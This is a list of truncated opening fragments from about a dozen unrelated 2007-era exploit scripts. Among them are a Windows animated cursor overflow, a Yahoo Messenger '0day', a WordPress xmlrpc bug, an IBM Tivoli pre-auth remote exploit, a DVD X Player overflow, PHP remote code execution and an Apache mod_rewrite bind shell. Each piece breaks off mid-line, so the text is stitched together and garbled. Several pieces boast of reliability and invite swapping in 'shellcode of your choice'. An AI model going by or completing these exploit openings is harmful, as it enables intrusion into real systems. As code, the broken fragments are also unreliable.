#!/usr/bin/env python # # $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $ # # Windows Animated Cursor Stack Overflow Exploit # Copyright 2007 Ramon de Carvalho Valle ramon@risesecurity.org, # RISE Security contact@risesecurity.org # # This p
This affects the viewer ywcvwr.dll with yahoo messenger latest version tested. Fixed bug in last post (x=0;xi800;x++) should be (x=0; x800; x++) Here is your 2nd 0day!!! link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 h
html !-- 45 minutes of fuzzing! Great results! very relible, runs calc.exe, replace with shellcode of your choice!!! link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 maybe more vulz! Greetz to: str0ke and shinnai! -- htm
/* El error, bastante tonto por cierto, se encuentra en la funcin wp_suggestCategories, en el archivo xmlrpc.php: function wp_suggestCategories($args) { global $wpdb; $this-escape($args); $blog_id = (int) $args[0]; $username = $args[1]; $password = $
#!/usr/bin/perl # # ~written by whoppix (c) 2007~ # This Piece of software may be freely (re-)distributed under the Terms of the LGPL. # for a short usage type ./script --help # this program requires: perl, Net::RawIP (depends on libpcap), Getopt::Lo
## # $Id: snmpc.rb 2007-06-03 $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of us
#!/usr/bin/perl use warnings; use strict; # # Remember: you need to accept ssh key first! # use Tie::File; use Fcntl 'O_RDONLY'; use Expect; use Time::HiRes qw(gettimeofday); # # tru64-sshenum.pl # HP Tru64 Remote Secure Shell user enumeration exploi
#!/usr/bin/python # # IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit # http://dvlabs.tippingpoint.com/advisory/TPTI-07-05 # Tested on windows 2003 server SP0. # Coded by Mati Aharoni # muts@offensive-security.com # http://www.offensive-secur
#!/usr/bin/env ruby #################################################################################################### #0day DVD X Player 4.1 Professional .PLF file buffer over flow found by n00b and poc by n00b. #First of all DVD x is prone to a b
#!/usr/bin/php -q -d short_open_tag=on ?php /* Explanation: The user verification routine used in most of the files is: ##### # # include(lib/config.php); #if ($_COOKIE['pheap_login'] != $username){ #header(Location: login.php); #} else { [CONTINUE E
#!/usr/bin/php -q -d short_open_tag=on ? echo Inout Search Engine (all version) Remote Code Execution Exploit by BlackHawk hawkgotyou@gmail.com http://itablackhawk.altervista.org Thanks to rgod for the php code and Marty for the Love ; if ($argc3) {
/* apache mod rewrite exploit (win32) By: fabio/b0x (oc-192, old CoTS member) Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)